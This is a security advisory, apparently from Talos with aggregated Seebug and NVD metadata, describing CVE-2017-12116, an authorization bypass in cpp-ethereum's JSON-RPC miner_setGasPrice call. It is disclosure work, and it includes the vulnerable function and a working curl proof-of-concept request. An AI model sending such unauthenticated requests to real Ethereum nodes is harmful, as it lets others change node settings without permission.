ID TALOS-2017-0468 Type talos Reporter Talos Intelligence Modified 2018-01-09T00:00:00
Description
Summary
An exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum’s JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.
CPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. One of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `miner_setGasPrice` API allows a remote attacker without any credentials to triggers functionality reserved only for a user with administrator privileges. We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:
- By default interface is bound to 0.0.0.0, which means it’s exposed to the world
- The Content-Type set to ‘application/json’ during requests is not enforced, which means that even if eth JSON-RPC daemon is ran on machine behind a NAT
the JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.
- older version of the same API had implemented an authorization check
- there is no visible option to change the default JSON-RPC interface to localhost
For comparison let us take geth (the go ethereum client) which also implements a JSON-RPC interface but using much better security practices: - by default the interface is bound to localhost - The “Content-Type” request header value must be set to ‘application/json’ - CORS settings are set to block by default all “cross-domain” requests
Let us take a look at miner_setGasPrice and describe in details improper/consistency check of authorization.
Line 277 bool AdminEth::miner_setGasPrice(string const& _gasPrice)
Line 278 {
Line 279 m_gp.setAsk(jsToU256(_gasPrice));
Line 280 return true;
Line 281 }
We are aware that this client is not recommended for mining and that the mentioned functionality related with the administrator interface is turned off by default. However when enabled the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.
Crash Information
icewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http
cpp-ethereum, a C++ Ethereum client
cpp-ethereum 1.3.0
By cpp-ethereum contributors, (c) 2013-2016.
See the README for contributors and credits.
Networking disabled. To start, use netstart or pass --bootstrap or a remote host.
JSONRPC Admin Session Key: Zt9zxSANHZs=
ℹ 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000…
ℹ 03:09:10 AM.978|miner0 Full DAG loaded
icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{"jsonrpc":"2.0","method":"miner_setGasPrice","params":["1"],"id":1}' localhost:8545
{"id":1,"jsonrpc":"2.0","result":true}
Timeline
2017-12-06 - Vendor Disclosure
2018-01-09 - Public Release
{"id": "TALOS-2017-0468", "vendorId": null, "type": "talos", "bulletinFamily": "info", "title": "CPP-Ethereum JSON-RPC miner_setGasPrice improper authorization Vulnerability", "description": "### Summary\n\nAn exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum\u2019s JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.\n\n### Tested Versions\n\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\n\n### Product URLs\n\n<http://cpp-ethereum.org>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\n\n### CWE\n\nCWE-285: Improper Authorization\n\n### Details\n \n \n CPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. One of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `miner_setGasPrice` API allows a remote attacker without any credentials to triggers functionality reserved only for a user with administrator privileges. We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\n \n -\tBy default interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\n -\tThe Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if eth JSON-RPC daemon is ran on machine behind a NAT \n \tthe JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\n -\tolder version of the same API had implemented an authorization check\n -\tthere is no visible option to change the default JSON-RPC interface to localhost\n \n\nFor comparison let us take geth (the go ethereum client) which also implements a JSON-RPC interface but using much better security practices: \\- by default the interface is bound to localhost \\- The \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019 \\- CORS settings are set to block by default all \u201ccross-domain\u201d requests\n\nLet us take a look at `miner_setGasPrice` and describe in details improper/consistency check of authorization.\n \n \n Line 277\tbool AdminEth::miner_setGasPrice(string const& _gasPrice)\n Line 278\t{\n Line 279\t\tm_gp.setAsk(jsToU256(_gasPrice));\n Line 280\t\treturn true;\n Line 281\t}\n \n\nWe are aware that this client is not recommended for mining and that the mentioned functionality related with the administrator interface is turned off by default. However when enabled the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\n\n### Crash Information\n \n \n icewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \n cpp-ethereum, a C++ Ethereum client\n cpp-ethereum 1.3.0\n By cpp-ethereum contributors, (c) 2013-2016.\n See the README for contributors and credits.\n Networking disabled. To start, use netstart or pass --bootstrap or a remote host.\n JSONRPC Admin Session Key: Zt9zxSANHZs=\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\n \n icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"miner_setGasPrice\",\"params\":[\"1\"],\"id\":1}' localhost:8545\n {\"id\":1,\"jsonrpc\":\"2.0\",\"result\":true}\n \n\n### Timeline\n\n2017-12-06 - Vendor Disclosure \n2018-01-09 - Public Release\n", "published": "2018-01-09T00:00:00", "modified": "2018-01-09T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0468", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2017-12116"], "immutableFields": [], "lastseen": "2022-01-26T11:51:43", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12116"]}, {"type": "seebug", "idList": ["SSV:97066"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B0D11FD8DA4E92C5F60226FDECD81A2B"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2017-12116"]}, {"type": "seebug", "idList": ["SSV:97066"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 1645556931}}
{"seebug": [{"lastseen": "2018-01-10T18:32:44", "description": "### Summary\r\nAn exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\r\n\r\n### Product URLs\r\nhttp://cpp-ethereum.org\r\n\r\n### CVSSv3 Score\r\n6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\r\n\r\n### CWE\r\nCWE-285: Improper Authorization\r\n\r\n### Details\r\nCPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. \r\n\r\nOne of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `miner_setGasPrice` API allows a remote attacker without any credentials to triggers functionality reserved only for a user with administrator privileges. We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\r\n```\r\n- By default interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\r\n- The Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if eth JSON-RPC daemon is ran on machine behind a NAT \r\n the JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\r\n- older version of the same API had implemented an authorization check\r\n- there is no visible option to change the default JSON-RPC interface to localhost\r\n```\r\n\r\nFor comparison let us take geth (the go ethereum client) which also implements a JSON-RPC interface but using much better security practices:\r\n```\r\n- by default the interface is bound to localhost\r\n- The \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019 \r\n- CORS settings are set to block by default all \"cross-domain\" requests\r\n```\r\n\r\nLet us take a look at `miner_setGasPrice` and describe in details improper/consistency check of authorization.\r\n```\r\nLine 277 bool AdminEth::miner_setGasPrice(string const& _gasPrice)\r\nLine 278 {\r\nLine 279 m_gp.setAsk(jsToU256(_gasPrice));\r\nLine 280 return true;\r\nLine 281 }\r\n```\r\n\r\nWe are aware that this client is not recommended for mining and that the mentioned functionality related with the administrator interface is turned off by default. However when enabled the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\r\n\r\n### Crash Information\r\n```\r\nicewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \r\ncpp-ethereum, a C++ Ethereum client\r\ncpp-ethereum 1.3.0\r\n By cpp-ethereum contributors, (c) 2013-2016.\r\n See the README for contributors and credits.\r\nNetworking disabled. To start, use netstart or pass --bootstrap or a remote host.\r\nJSONRPC Admin Session Key: Zt9zxSANHZs=\r\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\r\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\r\n\r\nicewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"miner_setGasPrice\",\"params\":[\"1\"],\"id\":1}' localhost:8545\r\n{\"id\":1,\"jsonrpc\":\"2.0\",\"result\":true}\r\n```\r\n\r\n### Timeline\r\n* 2017-12-06 - Vendor Disclosure\r\n* 2018-01-09 - Public Release", "published": "2018-01-10T00:00:00", "title": "CPP-Ethereum JSON-RPC miner_setGasPrice improper authorization Vulnerability(CVE-2017-12116)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12116"], "modified": "2018-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97066", "id": "SSV:97066", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "cve": [{"lastseen": "2022-04-19T21:48:27", "description": "An exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-19T23:29:00", "type": "cve", "title": "CVE-2017-12116", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12116"], "modified": "2022-04-19T19:15:00", "cpe": ["cpe:/a:ethereum:aleth:-"], "id": "CVE-2017-12116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12116", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ethereum:aleth:-:*:*:*:*:*:*:*"]}]}
